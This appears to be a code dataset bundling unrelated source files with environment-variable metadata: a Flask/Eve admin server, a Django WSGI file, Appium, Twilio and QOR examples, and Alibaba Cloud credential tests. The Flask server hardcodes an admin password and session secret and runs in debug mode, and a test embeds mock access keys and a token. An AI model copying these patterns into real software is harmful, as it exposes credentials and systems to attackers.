raise SystemExit("error: {}".format(str(msg)))
print("")
for entry in modules:
# Check if module file should be copied into the CMake install tree.
if _package_data_contain_module(entry, package_data):
continue
(package, _, src_module_file) = entry
# Copy missing module file
if os.path.exists(src_module_file):
dest_module_file = os.path.join(CMAKE_INSTALL_DIR(), src_module_file)
_copy_file(src_module_file, dest_module_file, hide_listing)
# Since the mapping in package_data expects the package to be associated
# with a list of files relative to the directory containing the package,
# the following section makes sure to strip the redundant part of the
# module file path.
# The redundant part should be stripped for both cmake_source_dir and
# the package.
package_parts = []
if cmake_source_dir:
package_parts = cmake_source_dir.split(os.path.sep)
package_parts += package.split(".")
stripped_module_file = strip_package(package_parts, src_module_file)
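# Hypothetical values to illustrate the stripping above: with
# cmake_source_dir="src" and package="foo.bar", a module file
# "src/foo/bar/baz.py" is reduced to "baz.py" before being recorded
# in package_data.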
# Update list of files associated with the corresponding package
try:
package_data[package].append(stripped_module_file)
except KeyError:
package_data[package] = [stripped_module_file]
def _consolidate_package_data_files(original_package_data, package_prefixes, hide_listing):
"""This function copies package data files specified using the ``package_data`` keyword
into :func:`.constants.CMAKE_INSTALL_DIR()`.
::
setup(...,
packages=['mypkg'],
package_dir={'mypkg': 'src/mypkg'},
package_data={'mypkg': ['data/*.dat']},
)
Considering that (1) the packages associated with modules located in both the source tree and
the CMake install tree are consolidated into the CMake install tree, and (2) the consolidated
package path set in the ``package_dir`` dictionary and later used by setuptools to package
(or install) modules and data files is :func:`.constants.CMAKE_INSTALL_DIR()`, copying the data files
is required to ensure setuptools can find them when it uses the package directory.
"""
project_root = os.getcwd()
for prefix, package in package_prefixes:
if package not in original_package_data:
continue
raw_patterns = original_package_data[package]
for pattern in raw_patterns:
expanded_package_dir = os.path.join(project_root, prefix, pattern)
for src_data_file in glob(expanded_package_dir):
full_prefix_length = len(os.path.join(project_root, prefix)) + 1
data_file = src_data_file[full_prefix_length:]
dest_data_file = os.path.join(CMAKE_INSTALL_DIR(), prefix, data_file)
_copy_file(src_data_file, dest_data_file, hide_listing)
| []
| []
| [
"PYTHONNOUSERSITE",
"CMAKE_ARGS",
"PYTHONPATH"
]
| [] | ["PYTHONNOUSERSITE", "CMAKE_ARGS", "PYTHONPATH"] | python | 3 | 0 | |
agreelance/wsgi.py | """
WSGI config for agreelance project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "agreelance.settings")
application = get_wsgi_application()
| []
| []
| []
| [] | [] | python | 0 | 0 | |
ADMIN/app/server.py | #Importing required libraries
from flask import request,render_template,redirect,url_for,json,session
from eve import Eve
from eve.auth import BasicAuth
from bson import ObjectId
from bson.json_util import dumps
from datetime import datetime,timedelta
from functools import wraps
import bcrypt
import os
#Defining directories for static files and views
PWD = os.environ.get('PWD')
templates = os.path.join(PWD,'templates')
static = os.path.join(PWD,'static')
#BasicAuth to protect API routes
class MyBasicAuth(BasicAuth):
def check_auth(self,username,password,allowed_roles,resource,method):
return username == 'Admin@surabi' and password == 'aDm!n@surab!'
#App - eve instance
app = Eve(auth=MyBasicAuth,static_folder=static,template_folder=templates)
app.secret_key = "b859cc924ec74258b675e3cd0df68e41bd6bc75c103a439f42"
#Login required decorator - wrapper
def login_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'logged_in' in session:
return f(*args, **kwargs)
else:
return redirect(url_for('login'))
return wrap
#API root
@app.route('/')
def rootURL():
return render_template('login.html')
#Login route
@app.route('/login',methods=['POST'])
def login():
error = None
email = request.form['inputUsername']
password = request.form['inputPassword']
# Note: do not log the submitted credentials.
account = app.data.driver.db['Admin']
account = account.find_one({'email': email})
if account and bcrypt.hashpw(password.encode('utf-8'),account['salt'].encode('utf-8')) == account['password']:
session['logged_in'] = True
session['_id'] = str(account['_id'])
return redirect(url_for('dashboard'))
else:
error = 'Invalid credentials.Please try again.'
return render_template('login.html',error=error), 400
#Create Admin
@app.route('/create',methods=['GET','POST'])
@login_required
def createAdmin():
if request.method == "GET":
return render_template('createAdmin.html')
success_msg = "Successfully Added!"
err_msg = "OOPS!Some technical issue has occured!"
name = request.form['name']
email = request.form['email']
password = request.form['password']
salt = bcrypt.gensalt(8).encode('utf-8')
if(name == None or email == None or password == None):
return json.dumps({'Err':'Missing parameters'}), 400, {'ContentType':'application/json'}
password = password.encode('utf-8')
password = bcrypt.hashpw(password,salt)
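# Sketch of the matching check performed at login (see /login above): the
# submitted password is re-hashed with the stored salt and compared with the
# stored hash, e.g.
#   bcrypt.hashpw(candidate.encode('utf-8'), salt) == stored_hash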
payload = {
"name" : name,
"email" : email,
"password" : password,
"salt" : salt,
"_created" : datetime.utcnow()
}
Admin = app.data.driver.db['Admin']
resp = Admin.insert(payload)
if type(resp) == ObjectId:
return render_template('createAdmin.html',success_msg=success_msg), 201
else:
return render_template('createAdmin.html',err_msg=err_msg), 400
#Approve student/mentor
@app.route('/approve/<userType>',methods=['POST','GET'])
@login_required
def approve(userType):
if userType == "mentor":
mentorId = request.form.get('mentorId')
mentor = app.data.driver.db['Mentor']
resp = mentor.update_one({
'_id': ObjectId(mentorId)
},{
'$set': {
'isApproved': True
}
}, upsert=False)
return 'OK',200
if userType == "student":
studentId = request.form.get('studentId')
student = app.data.driver.db['Student']
resp = student.update_one({
'_id': ObjectId(studentId)
},{
'$set': {
'isApproved': True
}
}, upsert=False)
return json.dumps({'success':True}), 200
#Dashboard route
@app.route('/dashboard',methods=['GET'])
@login_required
def dashboard():
mentor = app.data.driver.db['Mentor']
mentor_length = len(list(mentor.find()))
student = app.data.driver.db['Student']
student_length = len(list(student.find()))
date_dif = datetime.now() - timedelta(days=14)
Assignment = app.data.driver.db['Assignment']
ids = Assignment.find({'updated_at':{"$lt":str(date_dif)}}).distinct('student_id')
ids = [ObjectId(student_id) for student_id in ids]
inactive_users = list(student.find({'_id': {"$in": ids}}))
course = app.data.driver.db['Course']
course_list = list(course.find())
return render_template('dashboard.html',mentor_length = mentor_length,student_length = student_length,inactive_users = inactive_users, course_list = course_list)
#Deactivate student/mentor
@app.route('/deactivate/<userType>',methods=['POST','GET'])
@login_required
def deactivate(userType):
if userType == "mentor":
mentorId = request.form.get('mentorId')
mentor = app.data.driver.db['Mentor']
resp = mentor.update_one({
'_id': ObjectId(mentorId)
},{
'$set': {
'isApproved': False
}
}, upsert=False)
return json.dumps({'success':True}), 200
if userType == "student":
studentId = request.form.get('studentId')
student = app.data.driver.db['Student']
resp = student.update_one({
'_id': ObjectId(studentId)
},{
'$set': {
'isApproved': False
}
}, upsert=False)
return json.dumps({'success':True}), 200
#View all mentors/students
@app.route('/view/<userType>',methods=['GET'])
@login_required
def view(userType):
if userType == "mentors":
mentor = app.data.driver.db['Mentor']
mentors = dumps(mentor.find({}))
return json.dumps(mentors), 200
if userType == "students":
student = app.data.driver.db['Student']
students = dumps(student.find({}))
return json.dumps(students), 200
#Mentor view
@app.route('/mentor')
@login_required
def mentor():
mentor = app.data.driver.db['Mentor']
mentor_list = list(mentor.find())
return render_template('mentors.html',mentor_list=mentor_list)
#Student view
@app.route('/student')
@login_required
def student():
student = app.data.driver.db['Student']
student_list = list(student.find())
return render_template('students.html',student_list=student_list)
#Logout
@app.route('/logout')
@login_required
def logout():
session.pop('logged_in', None)
session.pop('id', None)
return redirect(url_for('rootURL'))
#Server startup
app.run(debug=True,port=8585)
| []
| []
| [
"PWD"
]
| [] | ["PWD"] | python | 1 | 0 | |
web/server/logic/streams.py | from google.appengine.ext import ndb
import os
from google.appengine.api import app_identity
from models import Photo
from googlephotos.google_photos import GooglePhotos
from photo_storage import read_photo_from_storage, write_photo_to_storage
class PhotoInfo:
def __init__(self, id):
self.id = id
def serialize(self):
return {
'id': self.id
}
def get_stream_photos(stream, max_pages):
if (stream.type == 'files'):
photos_query = Photo.query(ancestor=stream.key)
photos = photos_query.fetch(1000)
return [PhotoInfo(photo.key.id()) for photo in photos]
elif (stream.type == 'google-photos-album'):
google_auth = stream.google_auth_key.get()
google_photos = GooglePhotos(google_auth)
photos = google_photos.get_album_photos(stream.google_album_id, max_pages)
return [PhotoInfo(photo['id']) for photo in photos]
return []
def get_photo(stream, photo_id, photo_label, web_handler):
if (stream.type == 'files'):
photo_key = ndb.Key('Photo', int(photo_id), parent=stream.key)
photo = photo_key.get()
bucket_name = os.environ.get('BUCKET_NAME',
app_identity.get_default_gcs_bucket_name())
read_photo_from_storage(photo, photo_label, web_handler.response)
elif (stream.type == 'google-photos-album'):
google_auth = stream.google_auth_key.get()
google_photos = GooglePhotos(google_auth)
photo_url = google_photos.get_album_photo_url(photo_id)
if (photo_label == 'main'):
photo_url += '=d' # add the download parameter (https://developers.google.com/photos/library/guides/access-media-items#image-base-urls)
else:
photo_url += '=w206-h160' # add width & height parameters
return web_handler.redirect(str(photo_url))
else:
web_handler.response.status = 500
web_handler.response.write('stream type not supported')
| []
| []
| [
"BUCKET_NAME"
]
| [] | ["BUCKET_NAME"] | python | 1 | 0 | |
appium_example/src/test/java/example/ios/Tests/TestBase.java | package example.ios.Tests;
// import Sauce TestNG helper libraries
import com.saucelabs.common.SauceOnDemandAuthentication;
import com.saucelabs.common.SauceOnDemandSessionIdProvider;
import com.saucelabs.testng.SauceOnDemandAuthenticationProvider;
import io.appium.java_client.ios.IOSDriver;
import io.appium.java_client.AppiumDriver;
import com.saucelabs.testng.SauceOnDemandTestListener;
import org.openqa.selenium.MutableCapabilities;
import org.openqa.selenium.remote.CapabilityType;
import org.openqa.selenium.remote.DesiredCapabilities;
import org.openqa.selenium.remote.RemoteWebDriver;
import org.testng.annotations.AfterMethod;
import org.testng.annotations.DataProvider;
import org.testng.annotations.Listeners;
import java.lang.reflect.Method;
import java.net.MalformedURLException;
import java.net.URL;
import java.rmi.UnexpectedException;
// import testng annotations
// import java libraries
/**
* Simple TestNG test which demonstrates being instantiated via a DataProvider in order to supply multiple browser combinations.
*
* @author Neil Manvar
*/
@Listeners({SauceOnDemandTestListener.class})
public class TestBase implements SauceOnDemandSessionIdProvider, SauceOnDemandAuthenticationProvider {
public String seleniumURI = "@ondemand.saucelabs.com:443";
public String buildTag = System.getenv("BUILD_TAG");
public String username = System.getenv("SAUCE_USERNAME");
public String accesskey = System.getenv("SAUCE_ACCESS_KEY");
public String app = "https://github.com/saucelabs-sample-test-frameworks/Java-Junit-Appium-iOS/blob/master/resources/SauceGuineaPig-sim-debug.app.zip?raw=true";
/**
* Constructs a {@link SauceOnDemandAuthentication} instance using the supplied user name/access key. To use the authentication
* supplied by environment variables or from an external file, use the no-arg {@link SauceOnDemandAuthentication} constructor.
*/
public SauceOnDemandAuthentication authentication = new SauceOnDemandAuthentication(username, accesskey);
/**
* ThreadLocal variable which contains the {@link IOSDriver} instance used to interact with the application under test.
*/
private ThreadLocal<IOSDriver> iosDriver = new ThreadLocal<IOSDriver>();
/**
* ThreadLocal variable which contains the Sauce Job Id.
*/
private ThreadLocal<String> sessionId = new ThreadLocal<String>();
/**
* DataProvider that explicitly sets the browser combinations to be used.
*
* @param testMethod
* @return Two dimensional array of objects with browser, version, and platform information
*/
@DataProvider(name = "hardCodedBrowsers", parallel = true)
public static Object[][] sauceBrowserDataProvider(Method testMethod) {
return new Object[][]{
new Object[]{"iOS", "iPhone X Simulator", "12.2", "1.13.0", "portrait"},
new Object[]{"iOS", "iPad Pro (12.9 inch) Simulator", "12.2", "1.13.0", "portrait"}
};
}
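// Hypothetical usage sketch (not defined in this base class): a subclass test
// method could consume the rows above and start a Sauce session like so:
//
//   @Test(dataProvider = "hardCodedBrowsers")
//   public void verifyApp(String platformName, String deviceName, String platformVersion,
//                         String appiumVersion, String orientation, Method method) throws Exception {
//       createDriver(platformName, deviceName, platformVersion, appiumVersion, orientation, method.getName());
//       // ... interact with getiosDriver() ...
//   }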
/**
* @return the {@link iosDriver} for the current thread
*/
public IOSDriver getiosDriver() {
return iosDriver.get();
}
/**
*
* @return the Sauce Job id for the current thread
*/
public String getSessionId() {
return sessionId.get();
}
/**
*
* @return the {@link SauceOnDemandAuthentication} instance containing the Sauce username/access key
*/
@Override
public SauceOnDemandAuthentication getAuthentication() {
return authentication;
}
/**
* Constructs a new {@link IOSDriver} instance which is configured to use the capabilities defined by the platformName,
* deviceName, platformVersion, appiumVersion and deviceOrientation parameters, and which is configured to run against ondemand.saucelabs.com, using
* the username and access key populated by the {@link #authentication} instance.
*
* @param platformName name of the platformName. (Android, iOS, etc.)
* @param deviceName name of the device
* @param platformVersion Os version of the device
* @param appiumVersion appium version
* @param deviceOrientation device orientation
* @return
* @throws MalformedURLException if an error occurs parsing the url
*/
protected void createDriver(
String platformName,
String deviceName,
String platformVersion,
String appiumVersion,
String deviceOrientation,
String methodName)
throws MalformedURLException, UnexpectedException {
MutableCapabilities capabilities = new MutableCapabilities();
capabilities.setCapability("platformName", platformName);
capabilities.setCapability("platformVersion", platformVersion);
capabilities.setCapability("deviceName", deviceName);
capabilities.setCapability("browserName", "");
capabilities.setCapability("deviceOrientation", deviceOrientation);
capabilities.setCapability("appiumVersion", appiumVersion);
capabilities.setCapability("name", methodName);
capabilities.setCapability("build","Java-TestNG-Appium-iOS");
capabilities.setCapability("app", app);
if (buildTag != null) {
capabilities.setCapability("build", buildTag);
}
// Launch remote browser and set it as the current thread
iosDriver.set(new IOSDriver(
new URL("https://" + authentication.getUsername() + ":" + authentication.getAccessKey() + seleniumURI +"/wd/hub"),
capabilities));
String id = ((RemoteWebDriver) getiosDriver()).getSessionId().toString();
sessionId.set(id);
}
/**
* Method that gets invoked after each test.
* Quits the Appium driver session.
*/
@AfterMethod
public void tearDown() throws Exception {
//Quit the driver, ending the session on Sauce Labs.
iosDriver.get().quit();
}
}
| [
"\"BUILD_TAG\"",
"\"SAUCE_USERNAME\"",
"\"SAUCE_ACCESS_KEY\""
]
| []
| [
"SAUCE_USERNAME",
"SAUCE_ACCESS_KEY",
"BUILD_TAG"
]
| [] | ["SAUCE_USERNAME", "SAUCE_ACCESS_KEY", "BUILD_TAG"] | java | 3 | 0 | |
examples/service/proxy/session_interaction/page/session_interaction_page_example.go | package main
import (
"log"
"os"
"github.com/RJPearson94/twilio-sdk-go"
v1 "github.com/RJPearson94/twilio-sdk-go/service/proxy/v1"
"github.com/RJPearson94/twilio-sdk-go/service/proxy/v1/service/session/interactions"
"github.com/RJPearson94/twilio-sdk-go/session/credentials"
)
var proxyClient *v1.Proxy
func init() {
creds, err := credentials.New(credentials.Account{
Sid: os.Getenv("TWILIO_ACCOUNT_SID"),
AuthToken: os.Getenv("TWILIO_AUTH_TOKEN"),
})
if err != nil {
log.Panicf("%s", err.Error())
}
proxyClient = twilio.NewWithCredentials(creds).Proxy.V1
}
func main() {
resp, err := proxyClient.
Service("KSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").
Session("KCXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").
Interactions.
Page(&interactions.InteractionsPageOptions{})
if err != nil {
log.Panicf("%s", err.Error())
}
log.Printf("%v interaction(s) found on page", len(resp.Interactions))
}
| [
"\"TWILIO_ACCOUNT_SID\"",
"\"TWILIO_AUTH_TOKEN\""
]
| []
| [
"TWILIO_AUTH_TOKEN",
"TWILIO_ACCOUNT_SID"
]
| [] | ["TWILIO_AUTH_TOKEN", "TWILIO_ACCOUNT_SID"] | go | 2 | 0 | |
config/config.go | package config
import (
"os"
"github.com/jinzhu/configor"
"github.com/qor/auth/providers/facebook"
"github.com/qor/auth/providers/github"
"github.com/qor/auth/providers/google"
"github.com/qor/auth/providers/twitter"
"github.com/qor/location"
"github.com/qor/mailer"
"github.com/qor/mailer/logger"
"github.com/qor/media/oss"
"github.com/qor/oss/s3"
"github.com/qor/redirect_back"
"github.com/qor/session/manager"
)
type SMTPConfig struct {
Host string
Port string
User string
Password string
}
var Config = struct {
Port uint `default:"9003" env:"PORT"`
DB struct {
Name string `env:"DBName" default:"qor_example"`
Adapter string `env:"DBAdapter" default:"mysql"`
Host string `env:"DBHost" default:"localhost"`
Port string `env:"DBPort" default:"3306"`
User string `env:"DBUser"`
Password string `env:"DBPassword"`
}
S3 struct {
AccessKeyID string `env:"AWS_ACCESS_KEY_ID"`
SecretAccessKey string `env:"AWS_SECRET_ACCESS_KEY"`
Region string `env:"AWS_Region"`
S3Bucket string `env:"AWS_Bucket"`
}
SMTP SMTPConfig
Github github.Config
Google google.Config
Facebook facebook.Config
Twitter twitter.Config
GoogleAPIKey string `env:"GoogleAPIKey"`
BaiduAPIKey string `env:"BaiduAPIKey"`
}{}
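// Illustrative note (values are hypothetical): thanks to the configor struct tags
// above, individual settings can be overridden from the environment, e.g.
//   DBHost=db.internal DBUser=qor PORT=9000 ./app
// while config/database.yml and config/application.yml provide file-based defaults.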
var (
Root = os.Getenv("GOPATH") + "/src/github.com/qor/qor-example"
Mailer *mailer.Mailer
RedirectBack = redirect_back.New(&redirect_back.Config{
SessionManager: manager.SessionManager,
IgnoredPrefixes: []string{"/auth"},
})
)
func init() {
if err := configor.Load(&Config, "config/database.yml", "config/smtp.yml", "config/application.yml"); err != nil {
panic(err)
}
location.GoogleAPIKey = Config.GoogleAPIKey
location.BaiduAPIKey = Config.BaiduAPIKey
if Config.S3.AccessKeyID != "" {
oss.Storage = s3.New(&s3.Config{
AccessID: Config.S3.AccessKeyID,
AccessKey: Config.S3.SecretAccessKey,
Region: Config.S3.Region,
Bucket: Config.S3.S3Bucket,
})
}
// dialer := gomail.NewDialer(Config.SMTP.Host, Config.SMTP.Port, Config.SMTP.User, Config.SMTP.Password)
// sender, err := dialer.Dial()
// Mailer = mailer.New(&mailer.Config{
// Sender: gomailer.New(&gomailer.Config{Sender: sender}),
// })
Mailer = mailer.New(&mailer.Config{
Sender: logger.New(&logger.Config{}),
})
}
| [
"\"GOPATH\""
]
| []
| [
"GOPATH"
]
| [] | ["GOPATH"] | go | 1 | 0 | |
python-function-test/alibabacloud_credentials_test.py | # Copyright 2019 Alibaba Cloud Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import mock
from alibabacloud import get_client
from alibabacloud.client import AlibabaCloudClient
from alibabacloud.client import ClientConfig
from alibabacloud.credentials import AccessKeyCredentials
from alibabacloud.credentials.provider import RamRoleCredentialsProvider, \
DefaultChainedCredentialsProvider
from alibabacloud.exceptions import ServerException, PartialCredentialsException
from alibabacloud.request import APIRequest
from alibabacloud.vendored import requests
from base import SDKTestBase, MyServer
role_name = {u'Code': u'Success', u'LastUpdated': u'2019-04-09T10:41:31Z',
u'AccessKeyId': u'STS.NHLK9qYbdbKgs4oYTRXqjLSdX',
u'AccessKeySecret': u'J94mBKoeEUzDGwgUUsdXcf8hdbDm9Pht4A4R9vKParVT',
u'Expiration': u'2019-04-09T16:41:31Z',
u'SecurityToken': u'CAISigJ1q6Ft5B2yfSjIr4'
u'v5AIPFtL1F1YmMcRLevVQHVP5Go5bPujz2IHlFeXBoCekes/8'
u'yn29S6vwalrRtTtpfTEmBbI569s0M9hGjPZSQsM+n5qVUk5+1'
u'BjBe3ZEEFIqADd/iRfbxJ92PCTmd5AIRrJL+cTK9JS/HVbSCl'
u'Z9gaPkOQwC8dkAoLdxKJwxk2qR4XDmrQpTLCBPxhXfKB0dFox'
u'd1jXgFiZ6y2cqB8BHT/jaYo603392gcsj+NJc1ZssjA47oh7R'
u'MG/CfgHIK2X9j77xriaFIwzDDs+yGDkNZixf8aLOFr4Q3fFYh'
u'O/NnQPEe8KKkj5t1sffJnoHtzBJAIexOTzRtjFVtcH5xchqAA'
u'U8ECYWEiFKZtXwEpMnJUW4UXeXgzhMYDCeoLzrwQxcDwxpVEH'
u'KfA1zt+i/yAOXhJ1EgWwDPjyIeeFiR5VypJaHstnq/P0Jv/Uq'
u'ZAOS88KwDNLMHAc34HwmPNUnlsWc95B40ys91qtyHxQa1Jjjs'
u'LgE/S/5WyUQslQmuQI6e/rnT'}
class CredentialsTest(SDKTestBase):
def _init_client(self, service_name, api_version=None, region_id='cn-hangzhou'):
client = get_client(service_name=service_name, api_version=api_version,
region_id=region_id,
access_key_id=self.access_key_id,
access_key_secret=self.access_key_secret,
config=self.init_client_config())
return client
def test_call_request_with_client_env_priority(self):
self._create_default_ram_user()
self._create_access_key()
self._create_default_ram_role()
ram_role_arn_credential = RamRoleCredentialsProvider(
self.client_config,
AccessKeyCredentials(self.ram_user_access_key_id,
self.ram_user_access_key_secret),
self.ram_role_arn,
"alice_test")
client = AlibabaCloudClient(self.client_config, ram_role_arn_credential)
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
os.environ["ALIBABA_CLOUD_ACCESS_KEY_ID"] = self.access_key_id
os.environ["ALIBABA_CLOUD_ACCESS_KEY_SECRET"] = self.access_key_secret
response = client._handle_request(api_request)
response_credential = response.http_request.credentials
self.assertTrue(response_credential.access_key_id.startswith("STS."))
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
def test_call_request_with_env_config_priority(self):
os.environ.setdefault("ALIBABA_CLOUD_ACCESS_KEY_ID", self.access_key_id)
os.environ.setdefault("ALIBABA_CLOUD_ACCESS_KEY_SECRET", self.access_key_secret)
client_config = ClientConfig(region_id=self.region_id)
client = AlibabaCloudClient(client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
env_credential_id = os.environ.get("ALIBABA_CLOUD_ACCESS_KEY_ID")
env_credential_secret = os.environ.get("ALIBABA_CLOUD_ACCESS_KEY_SECRET")
response_key_id = response.http_request.credentials.access_key_id
response_key_secret = response.http_request.credentials.access_key_secret
self.assertEqual(env_credential_id, response_key_id)
self.assertEqual(env_credential_secret, response_key_secret)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_ID")
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_SECRET")
def test_call_request_with_env_role_name_priority(self):
os.environ.setdefault("ALIBABA_CLOUD_ACCESS_KEY_ID", self.access_key_id)
os.environ.setdefault("ALIBABA_CLOUD_ACCESS_KEY_SECRET", self.access_key_secret)
os.environ.setdefault("ALIBABA_CLOUD_ROLE_NAME", self.default_ram_role_name)
client_config = ClientConfig(region_id=self.region_id)
client = AlibabaCloudClient(client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
env_credential_id = os.environ.get("ALIBABA_CLOUD_ACCESS_KEY_ID")
env_credential_secret = os.environ.get("ALIBABA_CLOUD_ACCESS_KEY_SECRET")
response_key_id = response.http_request.credentials.access_key_id
response_key_secret = response.http_request.credentials.access_key_secret
self.assertEqual(env_credential_id, response_key_id)
self.assertEqual(env_credential_secret, response_key_secret)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_ID")
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_SECRET")
os.environ.pop("ALIBABA_CLOUD_ROLE_NAME")
def test_call_request_with_config_role_name_priority(self):
os.environ["ALIBABA_CLOUD_ROLE_NAME"] = self.default_ram_role_name
client_config = ClientConfig(region_id=self.region_id)
client = AlibabaCloudClient(client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
response_key_id = response.http_request.credentials.access_key_id
self.assertFalse(response_key_id.startswith("TST."))
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
os.environ.pop("ALIBABA_CLOUD_ROLE_NAME")
def test_call_rpc_request_with_introduction_ak(self):
client = AlibabaCloudClient(self.client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
response_credentials = response.http_request.credentials
from alibabacloud.credentials import AccessKeyCredentials
self.assertEqual(type(response_credentials), AccessKeyCredentials)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
def test_call_roa_request_with_introduction_ak(self):
client = AlibabaCloudClient(self.client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
api_request.uri_pattern = '/resource_types'
api_request.path_params = None
response = client._handle_request(api_request)
response_credentials = response.http_request.credentials
from alibabacloud.credentials import AccessKeyCredentials
self.assertEqual(type(response_credentials), AccessKeyCredentials)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("ResourceTypes"))
def test_call_rpc_request_with_sts_token(self):
self._create_default_ram_user()
# self._attach_default_policy()
self._create_access_key()
self._create_default_ram_role()
acs_client = ClientConfig(region_id=self.region_id)
ram_role_arn_credential = RamRoleCredentialsProvider(
acs_client,
AccessKeyCredentials(self.ram_user_access_key_id,
self.ram_user_access_key_secret),
self.ram_role_arn,
"alice_test")
client = AlibabaCloudClient(acs_client, ram_role_arn_credential)
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
response_credentials = response.http_request.credentials
self.assertTrue(response_credentials.access_key_id.startswith("STS."))
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
def test_call_roa_request_with_ram_role(self):
self._create_default_ram_user()
# self._attach_default_policy()
self._create_access_key()
self._create_default_ram_role()
roa_client = ClientConfig(region_id=self.region_id)
ram_role_arn_credential = RamRoleCredentialsProvider(
roa_client,
AccessKeyCredentials(self.ram_user_access_key_id,
self.ram_user_access_key_secret),
self.ram_role_arn,
"alice_test")
client = AlibabaCloudClient(roa_client, ram_role_arn_credential)
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
api_request.uri_pattern = '/resource_types'
api_request.path_params = None
response = client._handle_request(api_request)
response_credentials = response.http_request.credentials
self.assertTrue(response_credentials.access_key_id.startswith("STS."))
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("ResourceTypes"))
def test_call_rpc_request_with_env_ak(self):
os.environ["ALIBABA_CLOUD_ACCESS_KEY_ID"] = self.access_key_id
os.environ["ALIBABA_CLOUD_ACCESS_KEY_SECRET"] = self.access_key_secret
client_config = ClientConfig(region_id=self.region_id)
client = AlibabaCloudClient(client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
def test_call_roa_request_with_env_ak(self):
os.environ["ALIBABA_CLOUD_ACCESS_KEY_ID"] = self.access_key_id
os.environ["ALIBABA_CLOUD_ACCESS_KEY_SECRET"] = self.access_key_secret
client_config = ClientConfig(region_id=self.region_id)
client = AlibabaCloudClient(client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
api_request.uri_pattern = '/resource_types'
api_request.path_params = None
response = client._handle_request(api_request)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("ResourceTypes"))
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_ID")
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_SECRET")
@mock.patch("alibabacloud.credentials.provider.InstanceProfileCredentialsProvider")
def test_call_rpc_request_with_role_name(self, InstanceProfileCredentialsProvider):
with MyServer() as f:
os.environ["ALIBABA_CLOUD_ROLE_NAME"] = self.default_ram_role_name
InstanceProfileCredentialsProvider.rotate_credentials.return_value = \
requests.get(url="http://localhost:51352")
InstanceProfileCredentialsProvider.rotate_credentials. \
return_value = role_name
self.assertTrue(InstanceProfileCredentialsProvider.rotate_credentials)
def test_call_rpc_request_with_config_default(self):
